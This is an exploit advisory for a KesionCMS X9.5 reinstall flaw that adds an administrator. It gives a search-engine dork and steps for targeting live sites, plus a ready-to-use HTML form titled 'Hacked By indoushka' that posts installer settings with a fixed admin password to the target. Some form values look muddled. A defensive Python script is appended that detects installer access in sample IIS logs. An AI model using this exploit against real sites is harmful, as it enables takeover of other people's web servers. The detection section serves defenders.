====================================================================================================================================
| # Title : KesionCMS X9.5 Reinstall Add Admin Vulnerability                                                                       |
| # Author : indoushka                                                                                                             |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit)                                             |
| # Vendor : https://www.kesion.com/                                                                                               |
| # Dork : Powered by KesionCMS                                                                                                    |
====================================================================================================================================

poc :

[+] Dorking in Google or another search engine.
[+] Use payload : /install/index.asp
[+] http://127.0.0.1/install/?action=s4 = add your information to login
[+] Copy & paste the exploit listed below into a text file and save it with the ".html" extension
[+] Exploit :
[+] @t Line 09 & 16 change the domain name of target

<html>
<head>
<title> Hacked By indoushka </title>
<link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />
<script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>
<script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>
<script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>
</head>
<body>
<form name="form" method="post" action="http://127.0.0.1/install/index.asp" id="form">
<div class="guide">
<div class="guidetitle"> </div>
<div class="clear"></div>
</div>
<div class="clear"></div>
<input type="hidden" name="action" value="http://www.tzxdcpv.com/install/?action=s5" />
<input type="hidden" name="DBlx" value="" />
<input type="hidden" name="CkbData" value="" />
<input type="hidden" name="TxtDBName_a" value="" />
<input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden" />
<input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />
<input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />
<input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden" />
<div id="http://www.tzxdcpv.com/install/?action=s4"> </div>
<div class="clear"></div>
<div class="sjlist">
<h5>网站参数配置</h5>
<ul>
<li><span>网站名称:</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如:Kesion官方站</li>
<li><span>网站域名:</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 如http://www.kesion.com。 </li>
<li><span>安装目录:</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 系统会自动获取,建议不要修改。 </li>
<li><span>授 权 码:</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text"> 免费版本用户请留空或填“0”。 </li>
<li><span>后台目录:</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如:Manage,Admin,后面必须带"/"符号。</li>
<li><span> 后台登录验证码:</span> <input type="radio" name="isCode_a" value="True" /> 启用 <input type="radio" value="False" name="isCode_a" checked="checked"/> 不启用 </li>
<li><span>管理认证码:</span> <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用 <input onclick="$('#rzm').hide()" type="radio" value="False" name="isCode" checked="checked" /> 不启用 <font id="rzm" style="display:none">认证码:<input name="TxtManageCode" value="8888" id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>
</ul>
<div class="clear"></div>
<h5>填写管理员信息</h5>
<ul>
<li><span>管理员账号：</span><input name="TxtUserName" value="admin" id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>
<li><span>管理员密码:</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>
<li><span>重复密码:</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>
</ul>
<div class="clear blank10"></div>
<div style="padding:5px">
<input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">
</div>
</div>
</form>
</body>
</html>

Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                          |
=======================================================================================================================================
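The advisory's PoC works because the installer (/install/index.asp, steps s4 and s5) stays reachable on a deployed site, so a defender's first question is whether anyone has been hitting it. The following detection script is an added example, not part of the advisory: it parses constructed IIS W3C log lines (KesionCMS is ASP, so IIS is the assumed web server; the hostname www.example.com and the log lines are invented) and flags every request to the installer directory, calling out POSTs whose Referer is missing or points at another origin, as a cross-site page like the one above would produce.

```python
import re
from dataclasses import dataclass
from typing import Iterator, List
from urllib.parse import urlsplit

# Constructed sample lines in IIS W3C extended format (not taken from the advisory).
# The #Fields directive defines the column order, exactly as IIS writes it.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) cs(Referer) sc-status
2023-01-10 08:00:01 10.0.0.5 GET /index.asp - 80 203.0.113.7 Mozilla/5.0 - 200
2023-01-10 08:00:09 10.0.0.5 GET /install/ action=s4 80 203.0.113.7 Mozilla/5.0 - 200
2023-01-10 08:00:15 10.0.0.5 POST /install/index.asp - 80 203.0.113.7 Mozilla/5.0 http://evil.example/x.html 200
2023-01-10 08:01:00 10.0.0.5 GET /Admin/login.asp - 80 203.0.113.7 Mozilla/5.0 - 200
2023-01-10 08:02:00 10.0.0.5 GET /ks_inc/common.js - 80 198.51.100.2 Mozilla/5.0 http://www.example.com/ 200
"""
SITE_HOST = "www.example.com"  # assumed: the hostname this site is served as


@dataclass
class Finding:
    time: str
    client_ip: str
    method: str
    uri: str
    query: str
    reason: str


def parse_w3c(text: str) -> Iterator[dict]:
    """Yield one dict per request line, keyed by the names from the #Fields directive."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def detect_installer_abuse(text: str, site_host: str = SITE_HOST) -> List[Finding]:
    """Flag any request to /install/; IIS matches paths case-insensitively, so the regex does too."""
    findings: List[Finding] = []
    for rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem", "")
        if not re.match(r"(?i)^/install(/|$)", stem):
            continue
        reason = "request to installer after deployment"
        referer = rec.get("cs(Referer)", "-")
        if rec.get("cs-method") == "POST":
            # A POST that writes config or creates an admin should only ever come from the site's own pages.
            ref_host = urlsplit(referer).hostname if referer != "-" else None
            reason = "POST to installer" + ("" if ref_host == site_host else " from foreign or missing Referer")
        findings.append(Finding(rec["time"], rec["c-ip"], rec["cs-method"], stem, rec.get("cs-uri-query", "-"), reason))
    return findings
```

Any hit on a site that finished installation is worth an incident ticket; the durable fix is to remove or deny access to the /install/ directory once setup is complete.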